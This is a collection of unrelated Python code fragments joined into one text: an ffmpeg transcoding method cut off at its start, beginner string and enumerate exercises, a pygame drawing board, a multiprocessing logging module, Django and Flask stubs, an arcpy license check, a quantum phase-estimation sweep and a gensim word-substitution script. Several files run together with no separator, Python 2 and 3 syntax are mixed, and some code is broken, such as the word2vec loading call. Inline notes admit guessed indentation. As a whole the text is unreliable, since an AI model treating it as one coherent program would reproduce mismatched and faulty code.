        """Transcode *path* to *ext* and return a download link for the result.

        ogg -> libvorbis (quality 50, stream 0:1); mp4 -> libx264 ultrafast at
        768k; anything else -> ffmpeg's default codec for that container.
        """
        path = Utils.createPath(os.path.basename(path), self.user)
        # uniquify avoids clobbering an existing converted file of the same name
        filename = Utils.uniquify(Utils.getName(path) + '.' + ext)
        print 'Path to convert: ' + path
        #video = AudioSegment.from_file(path)
        path_to_convert = Utils.createPath(filename, self.user)
        if ext == 'ogg':
            call(["ffmpeg", "-i", path, "-map", "0:1", "-acodec", "libvorbis", "-aq", "50", path_to_convert])
            #video.export(path_to_convert, format=ext,
            #             codec="libvorbis", parameters=["-aq", "50"])
        elif ext == 'mp4':
            call(["ffmpeg", "-i", path, "-vcodec", "libx264", "-preset", "ultrafast", "-b:v", "768k", path_to_convert])
        else:
            call(["ffmpeg", "-i", path, path_to_convert])
            #video.export(path_to_convert, format=ext)
        return Utils.createLink(filename, self.user)
|
# Guided Exploration No. 3
# Ryan C. Rose
# Generate random multi-part "rap names" from a word list, writing each
# generated name to a file and echoing it to the console.
import random
# Initialize the "possible_names" list for future use.
possible_names = []
# Open/Create "rap-names-output.txt" with write access on outputFile.
outputFile = open('rap-names-output.txt', 'w')
# Temporarily opens "rap-names.txt" for reading for the duration of the "with" block.
with open('rap-names.txt', 'r') as dataFile:
    # Cycles through every line of "dataFile"
    for name in dataFile:
        # Append each line, right-stripped to remove the trailing line feed.
        possible_names.append(name.rstrip())
# Ask the user how many rap names to create (used in the outer loop below).
count = int(input('How many rap names would you like to create? '))
# Ask the user how many parts each rap name will have.
parts = int(input('How many parts should the name contain? '))
# Loop for the user-requested number of rap names
for i in range(count):
    # Initialize/Clear the "name_parts" list.
    name_parts = []
    # Loop for the user-requested number of parts per name
    for j in range(parts):
        # Append a random entry from the "possible_names" list.
        name_parts.append(
            possible_names[random.randint(0, len(possible_names)-1)])
    # Write the space-joined parts plus a line feed to the output file.
    outputFile.write(f"{' '.join(name_parts)}\n")
    # Echo what was just written to the console.
    print(f"{' '.join(name_parts)}")
# Close the "outputFile"
outputFile.close()
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
# coding=utf-8
# Demonstrate enumerate(): default 0-based indices, then 1-based indices via
# the optional start argument.
list1 = ["这", "是", "一个", "测试"]
for index, item in enumerate(list1):
    print(index, item)
for index, item in enumerate(list1, 1):
    print(index, item)
from django.contrib import admin
from .models import HeadTeacher
# Register your models here.
@admin.register(HeadTeacher)
class HeadTeacherAdmin(admin.ModelAdmin):
    """Admin list view for HeadTeacher: show class, semester and teacher columns."""
    list_display = ['classes','semester','teacher']
class Node(object):
    """A binary-tree node: an integer payload plus left/right child links."""

    def __init__(self, index):
        self.index = index       # payload printed during traversal
        self.left_child = None   # left subtree root (Node or None)
        self.right_child = None  # right subtree root (Node or None)
class BinaryTree(object):
    """Wraps a root node and offers a pre-order traversal that prints indices."""

    def __init__(self, root):
        self.root = root

    def pre_travel(self, node):
        """Pre-order: visit the node, then the left subtree, then the right."""
        if node is None:
            return
        print(node.index)
        self.pre_travel(node.left_child)
        self.pre_travel(node.right_child)
# Build a sample tree from nodes 1..9 and print its pre-order traversal.
# (Node 4 is created but never linked into the tree.)
node_dict = {}
for i in range(1, 10):
    node_dict[i] = Node(i)
node_dict[1].left_child = node_dict[2]
node_dict[1].right_child = node_dict[3]
node_dict[2].left_child = node_dict[5]
node_dict[2].right_child = node_dict[6]
node_dict[3].left_child = node_dict[7]
node_dict[7].left_child = node_dict[8]
node_dict[7].right_child = node_dict[9]
tree = BinaryTree(node_dict[1])
tree.pre_travel(tree.root)
# Statement
print("Hello world")
# Expression
x = 10
y = x + 2
print(x,y)
# String indexing: positive from the front, negative from the back
title = "Pyhon Course"
print(title[0], title[1], title[2], title[-1], title[-2])
# String case methods
name = 'Mehedi Amin'
print(name.title())
print(name.upper())
print(name.lower())
print(name.upper().lower().title())
# String concatenation
first_name = "Steve"
last_name = "Jobs"
name = first_name +'\n'+ last_name
print(name)
# Whitespace stripping (lstrip removes leading spaces only)
name = " Mr. X "
print('_' + name + '_')
print('_' + name.lstrip()+ '_')
# Printing single and double quotes inside strings
shop_name = "Rahim's Shop"
print(shop_name)
shop_name = 'Rahim" Shop'
print(shop_name)
shop_name = 'Rahim\'s Shop'
print(shop_name)
# Find a word in a sentence (find returns -1 when not found)
sentence = "A quick brown fox jumps over the lazy dog"
print(sentence.find('fox'))
print(sentence.find('foxs'))
# Replace text (replace substitutes every occurrence)
sentence = 'A quick brown fox jumps over the lazy dog'
sentence = sentence.replace('fox','tiger')
print(sentence)
sentence = "A quick brown fox jumps over the lazy fox"
sentence = sentence.replace('fox', 'tiger')
print(sentence)
# Print with a custom separator
x = 'Dhaka'
y = 'Bogra'
z = 'Comilla'
a = 300
b = 200
c = 400
print('Dhaka','|','Bogra','|','comilla')
print('300','|','200','|','400')
print(x,y,z, sep=' | ')
# String formatting: literal, str.format with named fields, %-formatting
person = "Mr.x's age is 77"
print(person)
person = "{name}'s age is {age}"
print(person.format(name='Mehedi Amin', age = 20))
person = '%s\'s age is %d'
print(person % ('Bil', 55))
# Slicing a substring
name = "Taylor Swift"
part_of_name = name[7:-1]
print(part_of_name)
|
__author__ = 'Skyeyes'
import pygame, sys, random
from pygame.locals import *
# Simple pygame drawing board: buttons down the left edge select a shape tool
# (rectangle / square / circle / ellipse) or "move" mode; shapes are drawn by
# dragging inside the canvas.
pygame.init()
pygame.display.set_caption("drawboard")
font1 = pygame.font.Font(None, 20)   # button captions
font2 = pygame.font.Font(None, 40)
font3 = pygame.font.Font(None, 80)
font4 = pygame.font.Font(None, 100)
white = 255, 255, 255
red = 220, 50, 50
yellow = 230, 230, 50
black = 0, 0, 0
shapestyle = ""  # currently selected shape tool ("" = none yet)
move = True      # True while "move" mode is active
screen = pygame.display.set_mode((1200, 800))
class Shape:
    """A drawable shape defined by its drag rectangle and a style name."""

    def __init__(self, begin_x, begin_y, end_x, end_y, shapestyle):
        # drag start / end coordinates in screen pixels
        self.begin_x = begin_x
        self.begin_y = begin_y
        self.end_x = end_x
        self.end_y = end_y
        self.shapestyle = shapestyle  # "rectangle" | "square" | "circle" | "ellipse"

    def draw(self):
        """Delegate the actual drawing to the model's shape dispatcher."""
        model().judge_draw_shape(self.begin_x, self.begin_y, self.end_x, self.end_y, self.shapestyle)
class model:
    """Drawing helpers: primitive blocks, text, and the shape dispatcher."""

    def draw_block(self, color, pos_x, pos_y, width, height, linewidth=0):
        # linewidth 0 = filled rectangle, >0 = outline thickness
        pygame.draw.rect(screen, color, (pos_x, pos_y, width, height), linewidth)

    def print_text(self, font, x, y, text, color=(255, 255, 255)):
        """Render *text* with *font* and blit it at (x, y)."""
        imgText = font.render(text, True, color)
        screen.blit(imgText, (x, y))

    def judge_draw_shape(self, begin_x, begin_y, end_x, end_y, shapestyle = ""):
        """Draw one shape from a drag rectangle; *shapestyle* picks the primitive.

        Squares and circles use the smaller drag dimension; drags in any
        direction (negative deltas) are normalized so the shape stays under
        the cursor.
        """
        if shapestyle == "rectangle":
            pygame.draw.rect(screen, black, (begin_x, begin_y, (end_x-begin_x), (end_y-begin_y)), 2)
        elif shapestyle == "square":
            width = min(abs(end_x-begin_x), abs(end_y-begin_y))
            pos_x = begin_x if (end_x-begin_x)>0 else begin_x-width
            pos_y = begin_y if (end_y-begin_y)>0 else begin_y-width
            pygame.draw.rect(screen, black, (pos_x, pos_y, width, width), 2)
        elif shapestyle == "circle":
            radius = min(abs((end_x-begin_x)//2), abs((end_y-begin_y)//2))
            pos_x = radius+begin_x if (end_x-begin_x)>0 else begin_x-radius
            pos_y = radius+begin_y if (end_y-begin_y)>0 else begin_y-radius
            # tiny circles are drawn filled instead of outlined
            if abs(radius) > 4:
                pygame.draw.circle(screen, black, (pos_x, pos_y), abs(radius), 2)
            else:
                pygame.draw.circle(screen, black, (pos_x, pos_y), abs(radius), 0)
        elif shapestyle == "ellipse":
            pos_x = begin_x if (end_x-begin_x)>0 else end_x
            pos_y = begin_y if (end_y-begin_y)>0 else end_y
            # tiny ellipses are drawn filled instead of outlined
            if min(abs(end_x-begin_x), abs(end_y-begin_y)) > 4:
                pygame.draw.ellipse(screen, black, (pos_x, pos_y, abs(end_x-begin_x), abs(end_y-begin_y)), 2)
            else:
                pygame.draw.ellipse(screen, black, (pos_x, pos_y, abs(end_x-begin_x), abs(end_y-begin_y)), 0)
def makebutton():
    """Draw the tool buttons (rectangle/square/circle/ellipse/move) and the canvas border."""
    model().draw_block(yellow, 10, 10, 50, 50)      # rectangle button
    model().draw_block(black, 20, 25, 30, 20, 2)
    model().draw_block(yellow, 10, 80, 50, 50)      # square button
    model().draw_block(black, 25, 95, 20, 20, 2)
    model().draw_block(yellow, 10, 150, 50, 50)     # circle button
    pygame.draw.circle(screen, black, (35, 175), 10, 2)
    model().draw_block(yellow, 10, 220, 50, 50)     # ellipse button
    pygame.draw.ellipse(screen, black, (20, 235, 30, 20), 2)
    model().draw_block(black, 100, 100, 1000, 600, 2)  # canvas border
    model().draw_block(yellow, 10, 290, 50, 50)     # move button
    model().print_text(font1, 17, 306, "move", black)
# All shapes drawn so far, in draw order.
shapelist = []

def save_shape(begin_x, begin_y, end_x, end_y):
    """Append the just-drawn shape (using the globally selected style) to shapelist."""
    if shapestyle == "rectangle":
        shapelist.append(Shape(begin_x, begin_y, end_x, end_y, "rectangle"))
    elif shapestyle == "square":
        shapelist.append(Shape(begin_x, begin_y, end_x, end_y, "square"))
    elif shapestyle == "circle":
        shapelist.append(Shape(begin_x, begin_y, end_x, end_y, "circle"))
    elif shapestyle == "ellipse":
        shapelist.append(Shape(begin_x, begin_y, end_x, end_y, "ellipse"))
def judgemoveshape(x, y):
    """Return the index of the first shape in ``shapelist`` whose bounding box
    contains (x, y), or None when no shape matches.

    Note: the test assumes begin_* <= end_*, i.e. shapes dragged towards the
    top-left (end < begin) are never matched — same behaviour as before.
    """
    for shape_index, shape in enumerate(shapelist):
        inside_x = shape.begin_x <= x <= shape.end_x
        inside_y = shape.begin_y <= y <= shape.end_y
        if inside_x and inside_y:
            return shape_index
def moveshape(begin_x, begin_y, end_x, end_y, shapeid):
    """Translate shapelist[shapeid] by the drag delta, clamped to the canvas.

    A component of the move is applied only if the shape would stay inside
    the 100..1100 x 100..700 drawing area; otherwise that component is zeroed.
    """
    movex = end_x-begin_x
    if movex >= 0:
        # Moving right: the rightmost edge must stay <= 1100.
        movex = movex if max(shapelist[shapeid].end_x, shapelist[shapeid].begin_x)+movex <= 1100 else 0
    else:
        # Moving left: the leftmost edge must stay >= 100.
        movex = movex if min(shapelist[shapeid].end_x, shapelist[shapeid].begin_x)+movex >= 100 else 0
    movey = end_y-begin_y
    if movey >= 0:
        movey = movey if max(shapelist[shapeid].end_y, shapelist[shapeid].begin_y)+movey <= 700 else 0
    else:
        movey = movey if min(shapelist[shapeid].end_y, shapelist[shapeid].begin_y)+movey >= 100 else 0
    shapelist[shapeid].end_x += movex
    shapelist[shapeid].begin_x += movex
    shapelist[shapeid].end_y += movey
    shapelist[shapeid].begin_y += movey
    # Debug output: which shape is being dragged and its kind.
    print(str(shapeid))
    print(shapelist[shapeid].shapestyle)
# ---- main event loop state ----
# NOTE(review): indentation of this loop was reconstructed from context --
# confirm against the original file.
begin_x = begin_y = end_x = end_y = 0
down = up = False
shapechooseid = -1
while True:
    screen.fill(white)
    makebutton()
    pygame.mouse.set_cursor(*pygame.cursors.arrow)
    for event in pygame.event.get():
        if event.type == QUIT:
            sys.exit()
        elif event.type == KEYUP:
            if event.key == pygame.K_ESCAPE:
                sys.exit()
        elif event.type == MOUSEBUTTONUP:
            mouse_up_x, mouse_up_y = event.pos
            # Palette hit-testing: selecting a tool sets the global
            # ``shapestyle`` / ``move`` mode flags.
            # NOTE(review): ``shapestyle`` and ``move`` are only defined after
            # the first button click; clicks elsewhere before that would hit
            # an unbound name below -- confirm intended.
            if 10 <= mouse_up_x <= 60 and 10 <= mouse_up_y <= 60:
                shapestyle = "rectangle"
                move = False
            elif 10 <= mouse_up_x <= 60 and 80 <= mouse_up_y <= 130:
                shapestyle = "square"
                move = False
            elif 10 <= mouse_up_x <= 60 and 150 <= mouse_up_y <= 200:
                shapestyle = "circle"
                move = False
            elif 10 <= mouse_up_x <= 60 and 220 <= mouse_up_y <= 270:
                shapestyle = "ellipse"
                move = False
            elif 10 <= mouse_up_x <= 60 and 290 <= mouse_up_y <= 340:
                shapestyle = ""
                move = True
            if down == True:
                # Finish a drag: clamp the release point to the canvas and,
                # in drawing mode, commit the shape.
                end_x = max(mouse_up_x, 100) if mouse_up_x < 600 else min(mouse_up_x, 1100)
                end_y = max(mouse_up_y, 100) if mouse_up_y < 400 else min(mouse_up_y, 700)
                down = False
                up = True
                if shapestyle:
                    save_shape(begin_x, begin_y, end_x, end_y)
                begin_x = begin_y = end_x = end_y = 0
        elif event.type == MOUSEMOTION:
            mouse_x, mouse_y = event.pos
            if 100 < mouse_x < 1100 and 100 < mouse_y < 700:
                if down:
                    # Track the drag so the preview / move follows the mouse.
                    end_x = mouse_x
                    end_y = mouse_y
                    draw_realy = False
        elif event.type == MOUSEBUTTONDOWN:
            mouse_down_x, mouse_down_y = event.pos
            if 100 < mouse_down_x < 1100 and 100 < mouse_down_y < 700:
                if shapestyle:
                    down = True
                    up = False
                    begin_x = mouse_down_x
                    begin_y = mouse_down_y
                if move:
                    down = True
                    up = False
                    begin_x = mouse_down_x
                    begin_y = mouse_down_y
                    # Pick the shape under the cursor, if any.
                    shapechooseid = judgemoveshape(begin_x, begin_y)
                    if shapechooseid == None:
                        shapechooseid = -1
    if down == True and begin_x >= 100 and begin_y >= 100 and end_x >= 100 and end_y >= 100:
        if shapestyle:
            # Drawing mode: show the live preview outline.
            model().judge_draw_shape(begin_x, begin_y, end_x, end_y, shapestyle)
        elif move and shapechooseid >= 0:
            # Move mode: translate the picked shape by the incremental delta.
            moveshape(begin_x, begin_y, end_x, end_y, shapechooseid)
            begin_x = end_x
            begin_y = end_y
            print(shapechooseid)
    # Redraw all committed shapes over the fresh background.
    for each in shapelist:
        each.draw()
    # print(rectangle, square, circle, ellipse)
    pygame.display.update()
"""
A set of classes for logging in multiprocessing environments. The logging system in this case includes two entities:
server and queued logger, which are connected with a multiprocessing queue. Server is represented by LoggingServer
class and a queued logger is represented by QueuedLogger class. In this model, a pair of connected server and queue
share the same name and can be accessed with get_server() and get_logger() functions.
QueuedLogger is a subclass of standard logging.Logger class and from the user side can be used as a usual logger.
The handlers and formatters are set on the server side via set_server_logger_initializer() function. An attempt to add
formatters or handlers to QueuedLogger instance will cause NotImplementedError.
The simplest workflow is:
1. Write a logger_initializer() function which sets up logging system from standard Python library and returns a logger
which will handle all messages for a server;
2. In the main process, call the function set_server_logger_initializer(logger_initializer=logger_initializer). It will
create a server and a queued logger, if they do not exist already.
3. Create subclass of multiprocessing.Process. In the constructor, create an attribute for the logger:
self.mp_logger = get_logger(). It is important to do it in the parent process, before you call start() function!
4. Start the server: start_server().
5. Start your process and use self.mp_logger as if it is a standard logger!
Notes:
- You can call start_server() before or after your child process is started, or even before self.mp_logger = get_logger().
But it is preferable to start the server as early as possible so that the queue does not get filled.
- You can use multiple servers (with different loggers). To do this, just pass the logger name (a string) to the
corresponding functions.
- You should consider calling set_server_init_params() and set_logger_init_params() functions before you set up
anything.
- The servers are stopped when the main process finishes. Make sure that you have joined your subprocesses or you may
lose log messages or get deadlocks.
"""
import atexit
import logging
import time
from multiprocessing import Queue, Lock
from Queue import Empty, Full
from ..concurrency.abstract_process_worker import AbstractProcessWorker
DEFAULT_NAME = "default"
def set_server_init_params(**kwargs):
    """
    Set initialization parameters for all new LoggingServer instances.
    Only servers created after this call are affected; existing ones keep
    their parameters.
    :param kwargs: initialization arguments. See LoggingServer constructor.
    """
    _manager.set_server_init_params(**kwargs)


def set_logger_init_params(**kwargs):
    """
    Set initialization parameters for all new QueuedLogger instances.
    Only loggers created after this call are affected.
    :param kwargs: initialization arguments. See QueuedLogger constructor.
    """
    _manager.set_logger_init_params(**kwargs)
def get_server(server_name=DEFAULT_NAME):
    """
    Get the logging server with the name specified by server_name. If it does not exist, new server and a corresponding
    logger are created (thin wrapper around the module-level _manager singleton).
    :param server_name: name of the server.
    :return: an instance of LoggingServer.
    """
    return _manager.get_server(server_name)


def get_logger(logger_name=DEFAULT_NAME):
    """
    Get the logger with the name specified by logger_name. If it does not exist, new logger and a corresponding server
    are created (thin wrapper around the module-level _manager singleton).
    :param logger_name: name of the queued logger.
    :return: an instance of QueuedLogger.
    """
    return _manager.get_logger(logger_name)
def set_server_logger_initializer(server_name=DEFAULT_NAME, logger_initializer=None):
    """
    Set the initializer for the internal logger of the server. The internal logger is the "regular" logger from the
    standard logging module. It is used to process all LogRecords which were passed through the queue to the server.
    :param server_name: name of the server (created on demand if missing).
    :param logger_initializer: a callable returning a logging.Logger instance (and performing other standard logging
    setup operations, e.g. handlers and formatters setting).
    """
    server = _manager.get_server(server_name)
    server.logger_initializer = logger_initializer
def start_server(server_name=DEFAULT_NAME):
    """
    Start a server with a given name. If it does not exist, new server and a corresponding logger are created.
    Use set_server_init_params() to set initialization parameters.
    :param server_name: name of the server to start.
    """
    server = _manager.get_server(server_name)
    server.start()


def stop_server(server_name=DEFAULT_NAME):
    """
    Stop a server with a given name. If it does not exist, it will be created
    (and stopping a never-started server is a no-op; see LoggingServer.stop()).
    Use set_server_init_params() to set initialization parameters.
    :param server_name: name of the server to stop
    """
    server = _manager.get_server(server_name)
    server.stop()
def stop_all_servers():
    """
    Stop all logging servers. May cause deadlock if some child processes are writing logs to queued loggers.
    This function is registered with atexit, so it is called when the main process finishes; it is NOT called when
    the program is killed by a signal not handled by Python, when a Python fatal internal error is detected, or
    when os._exit() is called.
    See: https://docs.python.org/2.7/library/atexit.html
    """
    _manager.stop_all_servers()
# Stop all the loggers when the main process finishes (registered once at import time).
# Note that this will not work if the program is killed by a signal not handled by Python, when a Python fatal internal
# error is detected, or when os._exit() is called.
# See: https://docs.python.org/2.7/library/atexit.html
atexit.register(stop_all_servers)
class Manager(object):
    """
    Internal registry pairing each name with a (LoggingServer, QueuedLogger) couple.
    Generally, there is no need to create instances of this class outside this module:
    the module-level ``_manager`` singleton is used instead.
    """

    def __init__(self):
        """Create an empty registry with no default init parameters."""
        self.servers_and_loggers = {}
        self.server_init_params = {}
        self.logger_init_params = {}

    def set_server_init_params(self, **kwargs):
        """Remember ``kwargs`` as constructor arguments for LoggingServer
        instances created from now on."""
        self.server_init_params = kwargs

    def set_logger_init_params(self, **kwargs):
        """Remember ``kwargs`` as constructor arguments for QueuedLogger
        instances created from now on."""
        self.logger_init_params = kwargs

    def get_server(self, name):
        """Return the LoggingServer registered under ``name``, creating the
        server/logger pair on first use."""
        return self._pair(name)[0]

    def get_logger(self, name):
        """Return the QueuedLogger registered under ``name``, creating the
        server/logger pair on first use."""
        return self._pair(name)[1]

    def stop_all_servers(self):
        """Stop every registered server. May deadlock if child processes are
        still writing to the queued loggers."""
        for server, _logger in self.servers_and_loggers.values():
            server.stop()

    def _pair(self, name):
        # Lazily build and cache the (server, logger) couple for ``name``,
        # wiring the logger to the server's input queue.
        if name not in self.servers_and_loggers:
            server = LoggingServer(name, **self.server_init_params)
            logger = QueuedLogger(name, **self.logger_init_params)
            logger.queue = server.queue
            self.servers_and_loggers[name] = (server, logger)
        return self.servers_and_loggers[name]
_manager = Manager()
class QueuedLogger(logging.getLoggerClass()):
    """
    Proxy logger for child processes: behaves like a logging.Logger from the
    user's side, but ``handle`` only forwards each LogRecord into ``self.queue``
    (served by the matching LoggingServer). Handler management is disabled and
    raises NotImplementedError; handlers belong on the server side.
    """

    def __init__(self, name, level=logging.NOTSET, handle_timeout=None):
        """
        A "client-side" logger which forwards all log records to the corresponding server.
        Be careful if handle_timeout is None, the call may block. If the corresponding server is not running
        (or crashed) a deadlock may occur.
        :param name: name of this logger (and the corresponding LoggingServer instance) in the module internal
        data structure.
        :param level: log level (see docs for logging standard module)
        :param handle_timeout: timeout for the logger-server queue. If not None, the message may be lost
        """
        super(QueuedLogger, self).__init__(name, level)
        self.handle_timeout = handle_timeout
        # Wired to the server's queue by Manager after construction.
        self.queue = None

    def handle(self, record):
        # Forward to the server; silently drop the record when the queue is
        # full or not yet attached (queue is None -> AttributeError).
        try:
            self.queue.put(record, timeout=self.handle_timeout)
        except (Full, AttributeError):
            pass  # TODO If needed, add a callback (optional)

    def addHandler(self, hdlr):
        raise NotImplementedError

    def removeHandler(self, hdlr):
        raise NotImplementedError

    def callHandlers(self, record):
        raise NotImplementedError

    def getChild(self, suffix):
        raise NotImplementedError
class LoggingServer(AbstractProcessWorker):
    """
    This class aggregates all LogRecords from different processes and moves them to a single logger.
    If the logger was not initialized, the server will "swallow" the messages without outputting them.
    """
    def __init__(self, name, qsize=0, queue_timeout=0.1, logger_initializer=None):
        """
        Create a new logging server.
        :param name: name of the logging server (and corresponding QueuedLogger instance) in the module internal
        data structure.
        :param qsize: size of the input queue (0 means unbounded).
        :param queue_timeout: queue query timeout. It is not very important, 0.1 second is a reasonable value for
        most cases
        :param logger_initializer: a callable object that sets up logging and returns an instance of logging.Logger,
        that is used to write logs
        """
        # super(AbstractProcessWorker, self).__init__()
        AbstractProcessWorker.__init__(self)
        self.queue = Queue(qsize)
        self.name = name  # By the way it overrides the multiprocessing.Process.name
        self.logger_initializer = logger_initializer
        # The real logger is created lazily in on_start(), i.e. inside the
        # server process, not in the parent.
        self._logger = None
        self._lock = Lock()
        self._lock_is_mine = False
        self._queue_timeout = queue_timeout

    def on_start(self):
        # The lock guards against two server processes draining the same queue.
        if not self._lock.acquire(block=False):
            raise RuntimeError("Only one LoggingServer should run at the same time!")
        self._lock_is_mine = True
        if self.logger_initializer is not None:
            self._logger = self.logger_initializer()
        if self._logger is not None:
            self._logger.info("Logging server '{}' started. PID: {}".format(self.name, self.pid))

    def do_work_once(self):
        # Poll with a timeout so the serving loop does not block forever on an
        # idle queue.
        try:
            log_record = self.queue.get(timeout=self._queue_timeout)
        except Empty:
            return
        # Forward the log_record to the internal _logger
        if self._logger is not None:
            self._logger.handle(log_record)

    def on_finish(self):
        # Release the lock
        if self._lock_is_mine:  # Any process can release a "foreign" lock so we have a flag
            self._lock_is_mine = False
            self._lock.release()
        if self._logger is not None:
            self._logger.info("Logging server '{}' finished. PID: {}".format(self.name, self.pid))

    def on_crash(self):
        if self._logger is not None:
            self._logger.exception("Logging server '{}' crashed. PID: {}".format(self.name, self.pid))

    def stop(self):
        """
        Stop the logging server if it runs. Does nothing if the server is not running.
        """
        # Wait until the queue is empty
        while not self.queue.empty():
            time.sleep(0.1)
        # Shutdown the server (someone may put something to a queue - it is not our problem)
        self.deactivate()
        try:
            self.join()
        except AssertionError:
            # join() on a process that was never started raises AssertionError;
            # treat that as "not running".
            pass
|
import math
def polygon_area(ns, ls):
    """Return the area of a regular polygon with ``ns`` sides of length ``ls``.

    Uses the closed form  n * s**2 / (4 * tan(pi / n)).
    """
    tangent = math.tan(math.pi / ns)
    side_squared = ls * ls
    return ns * side_squared / tangent / 4
print polygon_area(7, 3) |
import random
import numpy as np
from numpy import pi, exp, cos
import os
import time as time
import sys
from datetime import datetime
from bqpe import *
# Sweep the repetition cap M and record the failure rate of the Bayesian QPE
# routine (bqpe_analytical) at each setting, then plot the result.
M_range = np.linspace(1, 100, 100, dtype = int)
Attempts = 100        # trials per alpha value
pres = 5*10**-3       # target precision threshold
MaxR = 1/pres**2      # cap on runs per trial
from progress.bar import ShadyBar
bar = ShadyBar('Generating:', max = Attempts * len(M_range), suffix = '%(percent).2f%%')
data = []
# Map each M to an exponent alpha capped at 1 (log(pres) < 0, so the ratio is >= 0).
Alpha_List = -np.log(M_range)/np.log(pres)
Alpha_Values = [min(1, x) for x in Alpha_List]
for alpha in Alpha_Values:
    failures = 0
    idx = 0
    while idx < Attempts:
        # Random true phase for this trial.
        r = random.uniform(-pi, pi)
        # start = time.time()
        flag, est, error, runs, sig = bqpe_analytical(threshold = pres, Phi = r, Alpha = alpha, sigma = pi / 4, Max_Runs = MaxR)
        # end = time.time()
        # NOTE(review): indentation reconstructed -- assumed that only the
        # failure counter is conditional on flag == 1 and every trial advances
        # idx; confirm against the original file.
        if flag == 1:
            failures+=1
        idx+=1
        bar.next()
        # else:
        # print('failed')
    data.append(failures/Attempts)
bar.finish()
# print(data)
import matplotlib.pyplot as plt
plt.rcParams["font.family"] = "helvetica"
plt.plot(M_range, data, linewidth = 2)
plt.grid(True)
plt.xlabel('Max M', fontsize = 15)
plt.ylabel('Rate of failure', fontsize = 15, labelpad = 5)
plt.xticks(fontsize = 12)
plt.yticks(fontsize = 12)
plt.legend(fontsize = 12)  # NOTE(review): no labelled artists -- legend() will warn
plt.savefig('FailureRate_M_Uncapped.png', bbox_inches = 'tight')
plt.clf()
from django.urls import path
from . import views
# URL routes for this app: /campus/ renders the campus page.
urlpatterns = [
    path('campus/', views.campus_page, name='campus_page'),
]
|
#Ryan Ulsberger
#October 24, 2014
#Challenge Exercise 4 Chapter 5
import arcpy
from arcpy import env
# Workspace for the exercise data.
env.workspace = "C:/MS_GST/TGIS_501/lab4/Exercise05"

# Query the license state of each extension of interest.
extension_spatial = arcpy.CheckExtension("Spatial")
extension_net = arcpy.CheckExtension("Network")
extension_3d = arcpy.CheckExtension("3D")
my_extensions = [extension_spatial, extension_net, extension_3d]

available_extensions = []
for extension in my_extensions:
    if extension == "Available":
        # print(...) with a single value is identical under Python 2 and 3.
        print("Available")
        # Bug fix: the original appended the whole ``my_extensions`` list on
        # every match; record just the single matching extension state.
        available_extensions.append(extension)
    elif extension == "NotLicensed":
        print("not Licensed")
print(available_extensions)
|
# use gensim to summarize then use scispacy to find words then build hypernymy / synonymy substition with cuDF hypernymy tree
import gensim
import spacy
spacy.prefer_gpu()  # use the GPU for spaCy if one is available
nlp = spacy.load("en_core_sci_sm")  # scispacy small biomedical model
# Sample abstract used by replace_nouns() below.
text = """
Myeloid derived suppressor cells (MDSC) are immature
myeloid cells with immunosuppressive activity.
They accumulate in tumor-bearing mice and humans
with different types of cancer, including hepatocellular
carcinoma (HCC).
"""
# NOTE(review): ``embeddings_file`` is assigned but never used below.
embeddings_file = 'word_embeddings/word2vec/GoogleNews-vectors-negative300.bin'
model = gensim.models.Word2Vec.load("GoogleNews-vectors-negative300.bin.gz")
# NOTE(review): GoogleNews vectors are normally loaded with
# KeyedVectors.load_word2vec_format(..., binary=True); Word2Vec.load expects a
# gensim-native save file -- confirm this call actually loads the archive.
#doc = nlp(text)
#doc = nlp(text)
#print(doc.ents)
def replace_nouns(orig_text):
    """Return ``orig_text`` with each noun/proper noun swapped for a word2vec neighbour.

    Tokens that are not nouns, or whose surface form is missing from the
    embedding vocabulary, are kept unchanged; tokens are re-joined with single
    spaces, so original whitespace is not preserved.
    NOTE(review): ``token.orth_ in model`` vs ``model.wv.most_similar`` mixes
    the model object and its KeyedVectors; on gensim >= 4 membership must be
    tested on ``model.wv`` -- confirm against the installed gensim version.
    """
    doc = nlp(orig_text)
    new_text = ''
    for sent in doc.sents:
        for token in sent:
            if token.pos_ in ['NOUN', 'PROPN'] and token.orth_ in model:
                # most_similar returns (word, score) pairs; keep only the words.
                similar_words, _ = zip(*model.wv.most_similar(positive=[token.orth_]))
                # Remove same lemma and words with underscore
                similar_words = [w for w in similar_words if '_' not in w and list(nlp(w))[0].lemma_ != token.lemma_]
                alt_word = similar_words[0] if len(similar_words) > 0 else token.orth_
                new_text += alt_word + ' '
            else:
                new_text += token.orth_ + ' '
    return new_text
# Bug fix: ``new_text`` is local to replace_nouns(), so ``print(new_text)``
# raised NameError at module level; print the function's return value instead.
print(replace_nouns(text))
|
from flask import Flask, jsonify, request, render_template
import requests
import csv
import io
# Flask application serving the story-points predictor UI.
app = Flask("story_points_predictor", template_folder='templates')
# Module-level string placeholder. NOTE(review): the name ``json`` would
# shadow the stdlib ``json`` module inside this module if it is imported later.
json = ""


@app.route('/', methods=['GET'])
def get():
    """Serve the landing page template."""
    return render_template('index.html')
# -*- coding: utf-8 -*-
# Generated by Django 1.9.8 on 2016-08-23 19:12
from __future__ import unicode_literals
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Auto-generated migration: creates FailedEmailMessage and FailedSMSMessage.

    Each model stores the undelivered message payload as JSON, a failure
    reason, a retry counter, created/modified timestamps, and an optional
    owning KITUser (nulled if the user is deleted).
    """

    dependencies = [
        ('core', '0007_auto_20160823_2012'),
        ('messaging', '0008_auto_20160823_1103'),
    ]

    operations = [
        migrations.CreateModel(
            name='FailedEmailMessage',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('email_message', django.contrib.postgres.fields.jsonb.JSONField()),
                ('reason', models.CharField(max_length=255)),
                ('retries', models.PositiveSmallIntegerField()),
                ('last_modified', models.DateTimeField(auto_now=True)),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('owned_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.KITUser')),
            ],
        ),
        migrations.CreateModel(
            name='FailedSMSMessage',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('sms_message', django.contrib.postgres.fields.jsonb.JSONField()),
                ('reason', models.CharField(max_length=255)),
                ('retries', models.PositiveSmallIntegerField()),
                ('last_modified', models.DateTimeField(auto_now=True)),
                ('created', models.DateTimeField(auto_now_add=True)),
                ('owned_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='core.KITUser')),
            ],
        ),
    ]
|
import requests # pip install requests
